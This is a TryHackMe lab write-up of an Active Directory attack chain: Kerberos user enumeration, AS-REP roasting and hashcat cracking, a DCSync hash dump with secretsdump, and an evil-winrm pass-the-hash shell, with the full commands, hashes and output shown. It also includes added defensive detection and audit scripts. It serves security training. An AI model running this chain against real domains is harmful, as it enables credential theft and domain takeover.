TryHackMe - Attacktive Directory Write-up

https://tryhackme.com/r/room/attacktivedirectory

Last updated 7 months ago

This write-up focuses on the overall solving methodology rather than going task by task.

Different tools are showcased to achieve the same objective.

Enumeration

My target machine IP: 10.10.98.165

Check for domain name and naming contexts

First thing first, nmap scan.

nmap -n -sV --script "ldap* and not brute" 10.10.98.165 -vv -oN nmap.output

We've obtained some naming contexts and the domain (spookysec.local) from the output of the LDAP scripts:

Alternative way to look for naming contexts:

root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=spookysec,DC=local
namingcontexts: CN=Configuration,DC=spookysec,DC=local
namingcontexts: CN=Schema,CN=Configuration,DC=spookysec,DC=local
namingcontexts: DC=DomainDnsZones,DC=spookysec,DC=local
namingcontexts: DC=ForestDnsZones,DC=spookysec,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Check NULL bind

The result shows that a NULL (anonymous) bind is not allowed: the server answers with an Operations error stating that a successful bind is required first.

root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -b DC=spookysec,DC=local
# extended LDIF
#
# LDAPv3
# base <DC=spookysec,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
root@ip-10-10-155-73:~# 

Shares enumeration

The result shows that we're not allowed to list the shares anonymously, so we'll need to get some credentials.

root@ip-10-10-155-73:~# smbclient -L //10.10.98.165 -N
WARNING: The "syslog" option is deprecated
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.98.165]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.98.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

User enumeration

Mini wordlists are provided by the author to save us some time (links are at the end of this write-up).

The tools that can be used are kerbrute and ldapsearch.

To install Kerbrute:

$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

$ chmod +x kerbrute_linux_amd64

# add to path
$ sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute

# test installation
$ kerbrute

Using the wordlists provided, we can run kerbrute to get some usernames:

root@ip-10-10-155-73:~# kerbrute userenum -d spookysec.local --dc 10.10.98.165 userlist.txt -o valid_users

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 09/22/24 - Ronnie Flathers @ropnop

2024/09/22 06:59:11 >  Using KDC(s):
2024/09/22 06:59:11 >  	10.10.98.165:88

2024/09/22 06:59:11 >  [+] VALID USERNAME:	 james@spookysec.local
2024/09/22 06:59:12 >  [+] VALID USERNAME:	 svc-admin@spookysec.local
2024/09/22 06:59:12 >  [+] VALID USERNAME:	 James@spookysec.local
2024/09/22 06:59:12 >  [+] VALID USERNAME:	 robin@spookysec.local
2024/09/22 06:59:13 >  [+] VALID USERNAME:	 darkstar@spookysec.local
2024/09/22 06:59:13 >  [+] VALID USERNAME:	 administrator@spookysec.local
2024/09/22 06:59:14 >  [+] VALID USERNAME:	 backup@spookysec.local
2024/09/22 06:59:15 >  [+] VALID USERNAME:	 paradox@spookysec.local
2024/09/22 06:59:18 >  [+] VALID USERNAME:	 JAMES@spookysec.local
2024/09/22 06:59:19 >  [+] VALID USERNAME:	 Robin@spookysec.local
2024/09/22 06:59:24 >  [+] VALID USERNAME:	 Administrator@spookysec.local
2024/09/22 06:59:36 >  [+] VALID USERNAME:	 Darkstar@spookysec.local
2024/09/22 06:59:40 >  [+] VALID USERNAME:	 Paradox@spookysec.local
2024/09/22 06:59:52 >  [+] VALID USERNAME:	 DARKSTAR@spookysec.local
2024/09/22 06:59:56 >  [+] VALID USERNAME:	 ori@spookysec.local
2024/09/22 07:00:03 >  [+] VALID USERNAME:	 ROBIN@spookysec.local
2024/09/22 07:00:20 >  Done! Tested 73317 usernames (16 valid) in 68.499 seconds

Some notable accounts are svc-admin (service admin) and backup.

Alternatively, ldapsearch can be used, but since we could not perform a NULL bind, this method returns no results.

root@ip-10-10-155-73:~# ldapsearch -H ldap://10.10.98.165 -x -b DC=spookysec,DC=local "(objectClass=person)" | grep "sAMAccountName:"
root@ip-10-10-155-73:~#
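From the blue-team side, the enumeration above is noisy: every name kerbrute tries is one AS-REQ, and each name that does not exist is answered with KDC_ERR_C_PRINCIPAL_UNKNOWN, which a domain controller with "Audit Kerberos Authentication Service" enabled records as Event ID 4768 with Status 0x6. The following added example (my own code, not part of the write-up and not kerbrute's) runs a sliding-window detection over a constructed JSON-lines export of such events; the client addresses, usernames and timestamps in the sample are made up.

```python
"""Detect Kerberos username enumeration in domain-controller logs.

Added example; not from the write-up and not kerbrute's code. Each candidate
name that an enumeration tool tries becomes one AS-REQ. For names that do not
exist the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN, logged by the DC as Event
ID 4768 with Status 0x6. Valid names do not produce that failure, so the
signal is one client address generating 0x6 failures for many distinct
usernames inside a short window.
"""
import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample of 4768 records as a SIEM might export them (JSON lines).
# Client addresses and usernames are made up for this example.
SAMPLE_LOG = """\
{"time":"2024-09-22T06:59:10Z","id":4768,"TargetUserName":"james","Status":"0x0","IpAddress":"::ffff:10.10.20.5"}
{"time":"2024-09-22T06:59:11Z","id":4768,"TargetUserName":"aaron","Status":"0x6","IpAddress":"::ffff:10.10.155.73"}
{"time":"2024-09-22T06:59:11Z","id":4768,"TargetUserName":"abby","Status":"0x6","IpAddress":"::ffff:10.10.155.73"}
{"time":"2024-09-22T06:59:12Z","id":4768,"TargetUserName":"abel","Status":"0x6","IpAddress":"::ffff:10.10.155.73"}
{"time":"2024-09-22T06:59:13Z","id":4768,"TargetUserName":"adam","Status":"0x6","IpAddress":"::ffff:10.10.155.73"}
{"time":"2024-09-22T06:59:13Z","id":4768,"TargetUserName":"Aaron","Status":"0x6","IpAddress":"::ffff:10.10.155.73"}
{"time":"2024-09-22T06:59:14Z","id":4768,"TargetUserName":"adele","Status":"0x6","IpAddress":"::ffff:10.10.155.73"}
{"time":"2024-09-22T06:59:15Z","id":4768,"TargetUserName":"adrian","Status":"0x6","IpAddress":"::ffff:10.10.155.73"}
{"time":"2024-09-22T07:10:02Z","id":4768,"TargetUserName":"jsmitth","Status":"0x6","IpAddress":"::ffff:10.10.20.5"}
{"time":"2024-09-22T07:10:30Z","id":4768,"TargetUserName":"jsmith","Status":"0x0","IpAddress":"::ffff:10.10.20.5"}
"""


def parse_events(text):
    """Parse newline-delimited JSON records; 'time' becomes a datetime."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        rec["time"] = datetime.strptime(rec["time"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(rec)
    return events


def unknown_principal_bursts(events, window=timedelta(seconds=60), threshold=5):
    """Return {client_ip: peak} for clients whose count of distinct unknown
    usernames (4768 / Status 0x6) inside any `window` reaches `threshold`.
    Usernames are compared case-insensitively, as the KDC treats them."""
    by_client = defaultdict(list)
    for ev in events:
        if ev.get("id") == 4768 and ev.get("Status", "").lower() == "0x6":
            by_client[ev["IpAddress"]].append((ev["time"], ev["TargetUserName"].lower()))

    alerts = {}
    for client, attempts in by_client.items():
        attempts.sort()
        in_window = Counter()   # username -> occurrences inside the window
        left, peak = 0, 0
        for t, name in attempts:
            in_window[name] += 1
            # Slide the left edge forward until everything fits in the window.
            while t - attempts[left][0] > window:
                old = attempts[left][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                left += 1
            peak = max(peak, len(in_window))
        if peak >= threshold:
            alerts[client] = peak
    return alerts


if __name__ == "__main__":
    for ip, peak in unknown_principal_bursts(parse_events(SAMPLE_LOG)).items():
        print(f"possible username enumeration from {ip}: {peak} unknown names in 60s")
```

The single typo'd logon from 10.10.20.5 stays under the threshold, while the burst from 10.10.155.73 is flagged; in production the threshold and window are tuned against the baseline rate of 0x6 failures, which is normally very low.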

More information

We can get more info with enum4linux:

enum4linux 10.10.98.165

This tool helps us gather a lot of information automatically and with less effort.

Initial Foothold

Get password hash

Now that we have some usernames in hand, we can try an AS-REP Roasting attack. The tool sends an AS-REQ for each user account and identifies the ones that do not require Kerberos pre-authentication.

If successful, we get back a Kerberos AS-REP whose encrypted part is keyed from the user's password; that part can be extracted as a hash and cracked offline.

The hint in the earlier tasks told us that svc-admin might be interesting, so let's pass that username to our tool. Just press Enter without entering anything when prompted for a password.

root@ip-10-10-155-73:~# GetNPUsers.py spookysec.local/svc-admin -dc-ip 10.10.98.165 -request
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

Password:
[*] Cannot authenticate svc-admin, getting its TGT
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563

Hooray! The ticket is returned along with the hash.

I'll put it into a text file called svc-admin.hash.

root@ip-10-10-155-73:~# cat svc-admin.hash 
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563
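The exposure behind this step is an account setting, so the defender's check is to find every account that has it. The following added example (my own code, not from the write-up, Impacket or hashcat) audits an ldapsearch-style LDIF listing for accounts whose userAccountControl carries the DONT_REQUIRE_PREAUTH bit, and splits a mode-18200 line into its fields to show what the "hash" actually consists of. The LDIF entries and their flag values, and the short hash line, are constructed for the example; the bit values are the documented userAccountControl flags.

```python
"""Find accounts exposed to AS-REP roasting and pull apart the hash format.

Added example; not from the write-up, Impacket or hashcat. AS-REP roasting only
works against accounts whose userAccountControl has DONT_REQUIRE_PREAUTH
(0x400000) set. The $krb5asrep$23$ line that GetNPUsers.py prints is the
AS-REP's encrypted part for etype 23 (RC4-HMAC): a 16-byte HMAC-MD5 checksum
and the ciphertext, both keyed from the user's password, which is why a
wordlist can be tried against it offline.
"""
import re

# userAccountControl flag bits (documented AD values); only the ones reported here.
UAC_ACCOUNTDISABLE = 0x0002
UAC_DONT_EXPIRE_PASSWORD = 0x10000
UAC_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed LDIF in the shape ldapsearch returns for "(objectClass=person)"
# when sAMAccountName and userAccountControl are requested. Flag values are made up.
SAMPLE_LDIF = """\
dn: CN=james,CN=Users,DC=spookysec,DC=local
sAMAccountName: james
userAccountControl: 512

dn: CN=svc-admin,CN=Users,DC=spookysec,DC=local
sAMAccountName: svc-admin
userAccountControl: 4260352

dn: CN=backup,CN=Users,DC=spookysec,DC=local
sAMAccountName: backup
userAccountControl: 66048

dn: CN=oldsvc,CN=Users,DC=spookysec,DC=local
sAMAccountName: oldsvc
userAccountControl: 4194818
"""

# Constructed mode-18200 line: realistic layout, placeholder checksum and ciphertext.
SAMPLE_HASH = ("$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:"
               "00112233445566778899aabbccddeeff$" + "deadbeef" * 4)


def parse_ldif(text):
    """Return one dict per LDIF entry; entries are separated by blank lines."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        entries.append(current)
    return entries


def accounts_without_preauth(ldif_text):
    """Return [(sAMAccountName, is_disabled, password_never_expires)] for every
    account that does not require Kerberos pre-authentication."""
    found = []
    for entry in parse_ldif(ldif_text):
        uac = int(entry.get("userAccountControl", "0"))
        if uac & UAC_DONT_REQUIRE_PREAUTH:
            found.append((entry["sAMAccountName"],
                          bool(uac & UAC_ACCOUNTDISABLE),
                          bool(uac & UAC_DONT_EXPIRE_PASSWORD)))
    return found


ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$", re.IGNORECASE)


def parse_asrep_hash(line):
    """Split a hashcat mode 18200 line into its fields; None if malformed."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    fields = m.groupdict()
    fields["etype"] = int(fields["etype"])          # 23 = RC4-HMAC
    fields["edata_bytes"] = len(fields["edata"]) // 2  # hex -> byte length
    return fields


if __name__ == "__main__":
    for name, disabled, never_expires in accounts_without_preauth(SAMPLE_LDIF):
        print(f"{name}: pre-auth not required"
              f"{' (disabled)' if disabled else ''}"
              f"{' (password never expires)' if never_expires else ''}")
    print(parse_asrep_hash(SAMPLE_HASH))
```

Disabled accounts still show up in the audit because re-enabling one is a single attribute change; the usual fix is to clear the flag unless a specific legacy client genuinely needs it, and to give any account that must keep it a long random password.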

Cracking the hash

The $krb5asrep$23$ prefix tells us that the hashcat mode we need is 18200 (Kerberos 5, etype 23, AS-REP):

Remember the password list provided by the author earlier? We'll use that.

root@ip-10-10-155-73:~# hashcat -m 18200 svc-admin.hash passwordlist.txt 
hashcat (v6.1.1-66-g6a419d06) starting...

* Device #2: Outdated POCL OpenCL driver detected!

This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.

OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3832/3896 MB (974 MB allocatable), 2MCU

OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
===========================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 35 MB

Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:d23bacacc84229635907800006f7a958$9438e69f81aa21beae77b329a7532492e8bec1709388a8ad4d16e99f22be9d3f574756d4536d612178169ad3bee4748b8cee9b7e419b6301a8b6caa3617135c421d099440d568d8fb369701e87f88d1ac33b08eea54231dd9b62d27ad9d354e3a24ebfeb528c7b15bee5c2a1b07e7f7dd3ce710f0dde0fe1b11f3a4c45c82e262e3d285ec9f77b4734354d721fdd4643653cd228f32af335899701fb7c30097488f0f34c79ab7fa3a972f42d20b5a2b9f59425e1da9801e3b50d3ff2df90ace6269087c57d9ef821895b7be7e80d2eb67c5c9534de23a4a2be06549bbe12b7c36310d632de316ae6fd37baa0dfdf646f6563:management2005
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:d23bacacc84...6f6563
Time.Started.....: Sun Sep 22 07:32:20 2024 (0 secs)
Time.Estimated...: Sun Sep 22 07:32:20 2024 (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   578.5 kH/s (13.26ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/70188 (11.67%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 0/70188 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: m123456 -> whitey

Started: Sun Sep 22 07:31:59 2024
Stopped: Sun Sep 22 07:32:21 2024
root@ip-10-10-155-73:~# 

Password for svc-admin is management2005.

Looking into shares

This time we have valid credentials to log in to the share.

root@ip-10-10-155-73:~# smbclient -L //10.10.98.165 -U svc-admin%management2005
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backup          Disk      
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.98.165 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

For easier enumeration in the share, we'll switch to smbmap.

To install: sudo pip3 install smbmap

We've obtained a username called backup earlier, so it makes sense for us to have a look at the backup share first.

root@ip-10-10-155-73:~# smbmap -H 10.10.98.165 -u svc-admin -p management2005 -r backup

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.98.165:445	Name: ip-10-10-98-165.eu-west-1.compute.internal	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	backup                                            	READ ONLY	
	./backup
	dr--r--r--                0 Sat Apr  4 20:08:39 2020	.
	dr--r--r--                0 Sat Apr  4 20:08:39 2020	..
	fr--r--r--               48 Sat Apr  4 20:08:53 2020	backup_credentials.txt
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	SYSVOL                                            	READ ONLY	Logon server share 
[*] Closed 1 connections
root@ip-10-10-155-73:~# 

Recursive listing reveals a credential text file.

Login to the share and retrieve the file.

root@ip-10-10-155-73:~# smbclient //10.10.98.165/backup -U svc-admin
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 20:08:39 2020
  ..                                  D        0  Sat Apr  4 20:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 20:08:53 2020

		8247551 blocks of size 4096. 3664666 blocks available
smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (5.9 KiloBytes/sec) (average 5.9 KiloBytes/sec)
smb: \> exit
root@ip-10-10-155-73:~# cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Pasting it into CyberChef and clicking the magic wand tells us it's Base64.

Boom! It's the credential for the user account backup: backup@spookysec.local:backup2517860

Alternative way to decode the Base64 string:

root@ip-10-10-155-73:~# cat backup_credentials.txt | base64 -d
backup@spookysec.local:backup2517860

Privilege Escalation

Get admin credentials

As mentioned by the author:

A backup account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.

Hmm, this means that we can try to dump all the domain password hashes through this backup account's replication rights.

root@ip-10-10-155-73:~# secretsdump.py -outputfile secresdump.output -just-dc-ntlm spookysec.local/backup:backup2517860@10.10.98.165
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:7d4c1da7336435b8961a5840a7de68d7:::
[*] Cleaning up... 

Ahhh, look what we've got: the Administrator's hash.
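Beyond spotting the Administrator hash, a dump like this tells a defender quite a bit about password hygiene, because NT hashes are unsalted: two accounts with the same NT hash have the same password. The following added example (my own code, not from the write-up or Impacket) parses the secretsdump lines shown above, using them as its sample input, and reports accounts that share an NT hash and any account whose NT hash is that of the empty password; EMPTY_NT_HASH and EMPTY_LM_HASH are the well-known values for those cases.

```python
"""Audit a secretsdump NTDS dump for password hygiene problems.

Added example; not from the write-up or Impacket. Each line has the form
domain\\user:rid:lmhash:nthash::: as the tool prints it. Two things are worth
checking from the defender's side: accounts whose NT hash is the hash of the
empty string, and accounts sharing an NT hash (same password, since NT hashes
are unsalted). Machine accounts (trailing $) are left out of the reuse check.
"""
from collections import defaultdict

EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of ""
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"  # stored when LM hashing is off

# Sample input: the dump lines from the write-up above.
SAMPLE_DUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:7d4c1da7336435b8961a5840a7de68d7:::
"""


def parse_dump(text):
    """Return one dict per hash line: user (without domain prefix), rid, lm, nt, machine."""
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("["):      # skip blanks and [*] status lines
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        account, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        user = account.rsplit("\\", 1)[-1]        # "domain\user" -> "user"
        rows.append({"user": user, "rid": rid, "lm": lm, "nt": nt,
                     "machine": user.endswith("$")})
    return rows


def audit(text):
    """Group user accounts by NT hash and flag reuse, empty passwords and LM hashes."""
    rows = parse_dump(text)
    by_nt = defaultdict(list)
    for r in rows:
        if not r["machine"]:
            by_nt[r["nt"]].append(r["user"])
    return {
        "reused": {h: users for h, users in by_nt.items() if len(users) > 1},
        # Guest is normally disabled; the dump carries no account status, so
        # empty-password hits should be cross-checked against userAccountControl.
        "empty_password": [r["user"] for r in rows if r["nt"] == EMPTY_NT_HASH],
        "lm_present": [r["user"] for r in rows if r["lm"] != EMPTY_LM_HASH],
    }


if __name__ == "__main__":
    result = audit(SAMPLE_DUMP)
    for h, users in result["reused"].items():
        print(f"shared password ({h}): {', '.join(users)}")
    print("empty password:", result["empty_password"])
    print("LM hash stored:", result["lm_present"])
```

Run on the lab dump this reports that a-spooks shares its password with Administrator and that skidy shares one with breakerofthings, that Guest has an empty password, and that no LM hashes are stored; on a real NTDS export the same check is how you find shared admin passwords across "separate" accounts.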

Pass the hash

Now, we can perform pass-the-hash attack with the NTLM hash.

root@ip-10-10-155-73:~# evil-winrm -i 10.10.98.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
thm-ad\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Successful login!

Flags

Time to retrieve the flags from each user's Desktop.

Administrator:

*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/17/2020   4:04 PM                a-spooks
d-----        9/17/2020   4:02 PM                Administrator
d-----         4/4/2020  12:19 PM                backup
d-----         4/4/2020   1:07 PM                backup.THM-AD
d-r---         4/4/2020  11:19 AM                Public
d-----         4/4/2020  12:18 PM                svc-admin


*Evil-WinRM* PS C:\Users> ls Administrator/Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  11:39 AM             32 root.txt


*Evil-WinRM* PS C:\Users> cat Administrator/Desktop/root.txt
TryHackMe{4ctiveD1rectoryM4st3r}
*Evil-WinRM* PS C:\Users> 

svc-admin:

*Evil-WinRM* PS C:\Users> ls svc-admin/Desktop


    Directory: C:\Users\svc-admin\Desktop


